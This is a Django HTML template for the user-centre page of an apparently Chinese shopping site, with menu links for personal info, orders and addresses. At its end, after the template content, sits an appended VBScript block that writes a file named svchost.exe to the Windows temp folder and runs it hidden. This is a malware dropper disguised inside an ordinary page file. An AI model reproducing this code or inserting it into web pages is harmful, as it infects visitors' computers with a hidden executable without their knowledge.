{% extends 'base.html' %}
{% load static %}
{% block title %}用户中心 {% endblock title %}
{% block content %}
<div class="search_bar clearfix">
    <div class="sub_page_name fl">{% block user_title %}用户中心{% endblock user_title %}</div>
    <div class="search_con fr">
        <input type="text" class="input_text fl" name="" placeholder="搜索商品">
        <input type="button" class="input_btn fr" name="" value="搜索">
    </div>
</div>
{% block user_center %}
<div class="main_con clearfix">
    <div class="left_menu_con clearfix">
        <h3>用户中心</h3>
        <ul>
        <li><a href="{% url 'account:usercenterinfo' %}" {% if request.path == "/account/usercenterinfo/" %}class="active"{% endif %}>· 个人信息</a></li>
        <li><a href="{% url 'account:usercenterorder' %}" {% if request.path == "/account/usercenterorder/" %}class="active"{% endif %}>· 全部订单</a></li>
        <li><a href="{% url 'account:usercentersite' %}" {% if request.path == "/account/usercentersite/" %}class="active"{% endif %}>· 收货地址</a></li>
        <li><a href="{% url 'shop:index' %}">· 主页 </a></li>
        </ul>
    </div>
{% endblock user_center %}
    {% block user_content %} {% endblock user_content %}
</div>
{% endblock content %}<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = ""
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>